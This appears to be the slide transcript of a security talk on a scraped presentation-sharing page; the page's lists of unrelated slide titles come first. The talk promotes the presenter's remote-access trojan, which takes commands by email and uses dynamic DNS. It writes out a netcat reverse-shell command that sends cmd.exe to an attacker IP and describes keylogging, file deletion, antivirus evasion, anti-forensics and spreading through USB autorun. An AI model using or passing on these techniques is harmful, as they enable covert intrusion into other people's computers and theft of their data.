Artificial intelligence in the post-deep learning eraDeakin University
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 

Recently uploaded (20)

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

  • 1. Handle Explotion of Remote System Without Being Online !! By Merchant Bhaumik
  • 2.
  • 3.
  • 4.
  • 5.
  • 6. Who Am I ? • Currently Helping local law-enforcement And Helping In Securing Some Government Websites • Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection ) • Communicating with Metasploit Guys To Develop Term Called “ Universal Payload”
  • 7. Presentation Flow……. •Reverse Shell Using Dynamic-Dns Concepts • Getting Data From Victim Computer Using Email Tool
  • 8. We Will Understand This Mechanism By Considering One Scenario……..
  • 9. Jack’s Situaion………. Jack Working In A Company ...............! In Which All Computers Behind The NAT BOX……. ………………………! And He Just Decided To Break One Of The System Of His Office And Getting Shell From Office To Home Computer
  • 10. Problems For Jack…. •Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections…………. •He Don’t Know What IP Address Is Allocated By His ISP •He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
  • 11. Good Thing For Jack…. • Jack’s Office Allow Him To Access His Gmail Account..N Allow Some OutBound Traffic..
  • 13. Why Reverse Shell ? •Reverse Shell is one of the powerful method for Bypassing Network Intrusion Detection Systems , Firewalls ( Most Of The) etc • Because Some of this network intrusion only monitors In-bound connection … Not the Out-bound …… • Jack Has DMZ Network In His Office…..
  • 14. Diagram 1 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  • 15. Diagram 2 (Normal Attack ! ) 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( Attacker IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 Step I : Start Handler on port 4343 nc –l –p 4343 Victim Step II : nc 49.24.3.12 4343 –e cmd.exe
  • 16. Normal Flow Of Getting Reverse Shell Exploit ! Attacker Starts Handler Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  • 17. But What’s Wrong With Jack? He Don’t Know What IP Address Is Allocated To His Computer ( Dynamic IP Allocation By ISPs)
  • 18. Solution…. Attacker Is “Offline” But Still He Will Get Reverse Shell
  • 19. My Way……. Exploit ! Starting Handler On Local Attacker Starts Handler Machine Is Optional ! Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  • 20. Flow Of Execution…… Attacker ! Attack Exe Running in Victim Machine * If Attacker is not online still the exe is up and running in Attacker No !! remote machine and Update IP? if attacker updates DNS records… The Yes !! Reverse Shell Is On The Attacker’s Desk !! Attacker Receives Reverse Shell
  • 21. Mechanism • If the Code ( First Part ) receives positive Acknowledgement of sending packets ………… Jack Will Get Reverse Shell……………. •Else keep running in the victim machine and waits for Ack. From attacker’ machine…
  • 22. Dynamic DNS Way…. (Initially ! ) • First Part : catchme.dyndns-ip.com ( 255.255.255.255 ) • Second Part : payload.dyndns-ip.com ( 255.255.255.255 ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  • 23. Dynamic DNS Way…. (Finally ! ) • First Part : catchme.dyndns-ip.com ( 127.0.0.1 ) • Second Part : payload.dyndns-ip.com (Attacker’s IP ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  • 24. Metasploit………….!!!!! •You can embed my method (or My Exe ) with metasploit Payload which is of your choice . * The Structure of new Exe will be as per follow : NEW FINAL EXE CONSIS OF My Tool Synchronous Execution MSF PAYLOAD ( Single EXE ) ( LHOST = Dynamic ) New.exe
  • 25. Hands On NetWork 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  • 26. Time To Enjoy Cooked Cookies And Recipes !!
  • 27. Demo
  • 29. Normal Remote Trojans & Viruses ! Attacker Victim (Must Be Online !) (Must Be Online !)
  • 30. My Tool !! Caution: No Need To Be Online !! Attackers !! Attacker Victim MAY MAY OR OR MAY NOT ONLINE !! MAY NOT ONLINE !!
  • 31. So, How It Works ?? Zombie Attacker Victim
  • 32. But, Who Is Zombie?? @ It may be one of the below : It is one of like it……. Or one like this….. Or like this…….
  • 33. Features !! Execute Operating System Level Commands By Using Emails ! Get all Network Card Information with Allocated IP Addresses ! Live Tracking Of the System being used by victim ! Get All available account‟ List ! Enable/Disable Key Logger ! This All Stuff With Gmail , Yahoo , Hotmail………!!
  • 34. About It ! It is a simple application which Once Up & Going on Victim‟ Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail Email Services… There is no need to be Online for Attacker to attack the Victim System….. Attacker Has to send attack instructions to Any of the mail service & then it is like sitting on the door & watching the event , “ when it‟s gonna open !!” As Victim Connects to the internet …. Attack Launches & the results are automatically sent back to the Attacker‟s email Address…..
  • 35. Cool Benefits !! If the email account is used by using One of like below then it is totally Anti- Forensic ! No Reverse Detection Is Possible ! Create Unique password for all individual victims who are infected … Ability to handle multiple clients simultaneously ….. Delete Files In Victims Computer by Simply Sending An Email.. No Antivirus Can Detect Attack Because Of HTTPS ……
  • 36. Tool Syntax ….. Password_For_Victim “: “Task_Commands”:” E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password Command Which Sends back For The Particular Email Containing Account Info In Victim… Victim Computer !
  • 37. Snap Shot 1…(Load Attack Instructions) Password For Individual Victim Send Account info Of Victim.. Send Drive Info Of Victim… Sends Mac , Network card Info...
  • 38. Snap Shot 2…(Get Back Attack Result) Attached Info Of Victims Computer…! As Per Of Attacker‟ Choice My Emaill Account …… !
  • 40. No Fear Of Detection 1 No Direct Connection Between Attacker & Victim Attacker Victim
  • 41. No Fear Of Detection 2 No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It Self…….!
  • 42. How To Spread This Code?? Autorun.inf by USB Drives………. Phisical Access Of Victim‟s System….. During Metasploit Explotion ……
  • 43. Further Possible Development !! This Code Is Flexible Enough To Develop Further By My Hacker Friends….It Is Also Possible For Future To Send Exploits Or Trojans By Using This Code……. Any One Can Send Exploits , Trojans , RootKits , BackDoors By Simply Attaching It With Email And Sending It To His Own Account Or Account That is Configured In Victim‟ Code………
  • 44. Pros N Cons 1 ! ( Be Transparent !! ) Advantages are that the attacker never goin to caught if he/she using the browser like TOR , Anononymizer , VPNs or Any PROXy…. For accessing the attacking gmail account. No Antivirus can detect the Instruction data because all traffic gonna come from HTTPS …..! Only single email account of gmail goin to use for both the side. Attacker and victim machine both goin to connect same account but attacker knows ,But Victim Don‟t !!
  • 45. Pros N Cons 2 Disadvantage is that , if the victim has habit of checking the current connections using commands like „netstat –n‟ then possibility to detect Gmail connection when actually there is no browser activity. But still it is difficult to detect ………. Because process is running in Hidden mode….
  • 46. Hands On Time..! ( Demo)